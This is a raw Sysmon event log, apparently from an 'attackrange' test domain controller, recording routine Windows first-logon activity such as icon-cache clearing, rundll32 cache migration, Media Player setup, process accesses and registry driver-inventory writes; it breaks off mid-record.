13:58:24.039{59A5CD1D-93FF-6005-0105-00000000A301}27923360C:\Windows\System32\ie4uinit.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+176c|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000011206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.042{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492MediumMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 10341000x800000000000000011205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:24.039{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-93FF-6005-0105-00000000A301}27923360C:\Windows\System32\ie4uinit.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+1743|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000011199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.040{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 
11241100x800000000000000011223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:25.695{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt2021-01-18 12:24:26.227 10341000x800000000000000011222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:25.227{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:25.227{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:26.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:26.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:26.945{59A5CD1D-93FA-6005-FC04-00000000A301}37843160C:\Windows\Explorer.EXE{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+551ba4|C:\Windows\System32\SHELL32.dll+551600|C:\Windows\System32\SHELL32.dll+551774|C:\Windows\System32\SHELL32.dll+203065|C:\Windows\System32\SHELL32.dll+8128d|C:\Windows\System32\SHELL32.dll+45f51 154100x800000000000000011240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.952{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe12.0.14393.4169 (rs1_release.210107-1130)Microsoft Windows Media Player Setup UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationunregmp2.exe"C:\Windows\System32\unregmp2.exe" /FirstLogonC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=0AFAF8B10C3D2B009DED280C875EA3EA,SHA256=CFC5A8170AF2CCB8F846BA738E5173596A4C35C023BCE5E6EB04E07779283188,IMPHASH=DFC94E57160B0CE8835243B5D92F3D9E{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 
10341000x800000000000000011239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9402-6005-0505-00000000A301}4100C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.789{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9402-6005-0505-00000000A301}4100C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9402-6005-0505-00000000A301}4100C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000011232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:26.789{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe\REGISTRY\A\{75980880-3470-ec82-7755-0f71170c6805}\Root\InventoryDevicePnp\swd/scdeviceenumbus/1\DriverVerVersion10.0.14393.0 13241300x800000000000000011231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:26.773{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe\REGISTRY\A\{75980880-3470-ec82-7755-0f71170c6805}\Root\InventoryDevicePnp\swd/scdeviceenumbus/0\DriverVerVersion10.0.14393.0 13241300x800000000000000011230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:26.773{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe\REGISTRY\A\{75980880-3470-ec82-7755-0f71170c6805}\Root\InventoryDevicePnp\terminput_bus/umb/2&2c22bcc9&0&session2mouse0\DriverVerVersion10.0.14393.0 10341000x800000000000000011229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:26.773{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C